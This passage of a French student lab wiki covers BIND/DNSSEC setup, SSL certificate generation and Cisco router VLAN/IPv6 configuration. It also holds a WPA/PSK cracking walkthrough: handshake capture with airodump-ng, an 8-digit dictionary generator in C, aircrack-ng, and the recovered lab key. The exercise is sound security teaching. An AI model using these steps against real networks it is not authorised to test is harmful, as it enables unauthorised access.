        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
